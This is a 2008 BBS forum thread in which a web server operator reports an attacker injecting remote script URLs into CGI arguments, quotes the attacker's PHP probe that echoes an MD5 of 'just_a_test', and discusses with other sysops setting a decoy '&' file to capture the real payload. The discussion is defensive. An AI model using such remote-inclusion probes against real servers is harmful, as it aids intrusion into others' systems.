There's a guy comes around periodically and fiddles with my webserver.
He's definately up to no good, because he tools around until he finds a
CGI program and tries injecting URLs to scripts on russian (or taiwanese) servers into the argument list of such CGIs.

The server alerts me whenever he appears. Generally speaking, I just let
him enjoy himself, since he's not getting anywhere.

But one thing I can't quite figure why he's doing it. He keeps trying to view/execute the object '&' in various directories. So I keep getting
"File does not exist" errors in all the various directories on the site.
Sort of like:

File does not exist: /var/www/htdocs/this/directory/&
File does not exist: /var/www/htdocs/that/directory/&
File does not exist: /var/www/htdocs/some/other/directory/&

Anybody recognise this? I suspect that he is attempting to drop something
on my server named '&' by way of a broken CGI script, and then execute it. He's tried injecting several URLs, some of which are 404 but the rest all return this script:

<?php echo md5("just_a_test");?>

Obviously, if this works, the real payload will follow. It strikes me
that I should deliberately insert this test script in a few directories,
name it '&' and wait for him to try again in a few days, or weeks. When
he gets back his expected response, he will then try with the URL to the *real* exploit, and maybe we can get a copy of that!

Wotcha think?

---
Playing: "Take the money & run" by "The Steve Miller Band"
from the "Fly like an eagle" album.
þ Synchronet þ With my ISP it's the InterNOT at The ANJO BBS

Re: Exploit?
By: Angus McLeod to All on Sat Jan 19 2008 11:16 am

There's a guy comes around periodically and fiddles with my webserver.
He's definately up to no good, because he tools around until he finds a
CGI program and tries injecting URLs to scripts on russian (or taiwanese) servers into the argument list of such CGIs.

The server alerts me whenever he appears. Generally speaking, I just let him enjoy himself, since he's not getting anywhere.

But one thing I can't quite figure why he's doing it. He keeps trying to view/execute the object '&' in various directories. So I keep getting
"File does not exist" errors in all the various directories on the site. Sort of like:

File does not exist: /var/www/htdocs/this/directory/&
File does not exist: /var/www/htdocs/that/directory/&
File does not exist: /var/www/htdocs/some/other/directory/&

Anybody recognise this? I suspect that he is attempting to drop something on my server named '&' by way of a broken CGI script, and then execute it. He's tried injecting several URLs, some of which are 404 but the rest all return this script:

<?php echo md5("just_a_test");?>

Obviously, if this works, the real payload will follow. It strikes me
that I should deliberately insert this test script in a few directories, name it '&' and wait for him to try again in a few days, or weeks. When
he gets back his expected response, he will then try with the URL to the *real* exploit, and maybe we can get a copy of that!

Wotcha think?

Track him down and dispatch of him with extreme prejudice.

Dirty Jack Rackham...A.K.A: Ralph Smole
www.bullishmcgee.com
www.ralphsmole.com
nimbus.synchro.net



---
þ Synchronet þ The Nimbus BBS: nimbus.synchro.net AND www.freewebs.com/ralphsmole

Obviously, if this works, the real payload will follow. It strikes me
that I should deliberately insert this test script in a few directories, name it '&' and wait for him to try again in a few days, or weeks. When
he gets back his expected response, he will then try with the URL to the *real* exploit, and maybe we can get a copy of that!
Wotcha think?

Hell Angus, go for it. Apparently whomever is doing this isn't smart
enough to do it on his own anyhow, and if it "worked", he would
probably shit himself.. ;o)

Terry


---
þ Synchronet þ Darkness BBS - darkness.synchro.net

Re: Exploit?
By: Death to Angus McLeod on Sat Jan 19 2008 17:38:00

Obviously, if this works, the real payload will follow. It strikes me that I should deliberately insert this test script in a few directories, name it '&' and wait for him to try again in a few days, or weeks. When he gets back his expected response, he will then try with the URL to the *real* exploit, and maybe we can get a copy of that!
Wotcha think?

Hell Angus, go for it. Apparently whomever is doing this isn't smart
enough to do it on his own anyhow, and if it "worked", he would
probably shit himself.. ;o)

See, even if he *could* dump some PHP exploit code on my system in a file named '&', how does he expect to get it executed? The PHP interpreter
isn't going to RUN the script unless it is named with a .php extension, is
it? All that would happen, is that the server send him his own exploit
script back again!



---
Playing: "A little something" by "Crash Test Dummies"
from the "Give yourself a hand" album.
þ Synchronet þ With my ISP it's the InterNOT at The ANJO BBS

See, even if he *could* dump some PHP exploit code on my system in a file named '&', how does he expect to get it executed? The PHP interpreter
isn't going to RUN the script unless it is named with a .php extension, is it? All that would happen, is that the server send him his own exploit script back again!

Which would be gut-bustingly funny.. And as far as I know, it would
HAVE to be &.php to actually be executed..

Terry


---
þ Synchronet þ Darkness BBS - darkness.synchro.net

On 1/19/2008 8:29 PM, Angus McLeod wrote:

See, even if he *could* dump some PHP exploit code on my system in a file named '&', how does he expect to get it executed? The PHP interpreter
isn't going to RUN the script unless it is named with a .php extension, is it? All that would happen, is that the server send him his own exploit script back again!

I'm guessing that the script is looking for some other exploit to be in place, or a flaw in apache or a asapi module... you don't seem to be affected by this, but it's always an interesting curiousity that follows... I don't check my logs nearly as often as I should.. usually see tons of tests for exploits in older versions of IIS on this end... not sure how many people are running old versions of IIS3-5 on unpatched nt4/win2000 boxes though...

--
Michael J. Ryan - tracker1(at)theroughnecks(dot)net - www.theroughnecks.net icq: 4935386 - AIM/AOL: azTracker1 - Y!: azTracker1 - MSN/Win: (email)

... FRA #261: A wealthy man can afford anything except a conscience.

---
þ Synchronet þ theroughnecks.net - you know you want it

Re: Re: Exploit?
By: Tracker1 to Angus McLeod on Thu Jan 24 2008 05:41:00

I'm guessing that the script is looking for some other exploit to be in plac or a flaw in apache or a asapi module... you don't seem to be affected by this, but it's always an interesting curiousity that follows... I don't chec my logs nearly as often as I should.. usually see tons of tests for exploits in older versions of IIS on this end... not sure how many people are runnin old versions of IIS3-5 on unpatched nt4/win2000 boxes though...

So what I could do is execute his exploit test, capture the output, and
serve it when he requests the "&" file. He ought to be getting back
exactly what he would expect if the code ran. That should trigger his
attempt to drop a real payload on the box, which would let me retrieve his exploit package and, uh, exploit it?



---
Playing: "Time ago" by "Black Lab" from the "Your Body Above Me" album.
þ Synchronet þ With my ISP it's the InterNOT at The ANJO BBS

Re: Re: Exploit?

Re: Re: Exploit?
By: Tracker1 to Angus McLeod on Thu Jan 24 2008 05:41:00

I'm guessing that the script is looking for some other exploit to be in
or a flaw in apache or a asapi module... you don't seem to be affected this, but it's always an interesting curiousity that follows... I don't
my logs nearly as often as I should.. usually see tons of tests for exp
in older versions of IIS on this end... not sure how many people are r old versions of IIS3-5 on unpatched nt4/win2000 boxes though...

So what I could do is execute his exploit test, capture the output, and
serve it when he requests the "&" file. He ought to be getting bac
exactly what he would expect if the code ran. That should trigger his attempt to drop a real payload on the box, which would let me retrieve his exploit package and, uh, exploit it?

Sounds like he's looking for a cross-site scripting vulnerability, so they can inject all sorts of crap. To go along with the '&' file, just make it a text file with just_a_test in it and name it '&', and stick it our in a directory. It should fool them into thinking their test *worked*. Should be funny to see what happens then.

Just my $.0002 worth. :)

Jay

--
[K5JAT BBS] -- [telnet://bbs.k5jat.com] -- [http://bbs.k5jat.com]

Re: Re: Exploit?
By: k5jat to Angus McLeod @QWKNET*67 on Thu Jan 24 2008 19:36:00

To go along with the '&' file, just make it a text file with
just_a_test in it and name it '&', and stick it our in a directory It should fool them into thinking their test *worked*. Should be funny to
see what happens then.

Well, I'd have to put the MD5 of it in the text-file, but essentially yes, that's what I was thinking. And when he tries to run an exploit, I can
grab the exploit code and try to see what it's doing.

---
Playing: "Gospel plow" by "Screaming Trees" from the "Dust" album.

---
þ Synchronet þ With my ISP it's the InterNOT at The ANJO BBS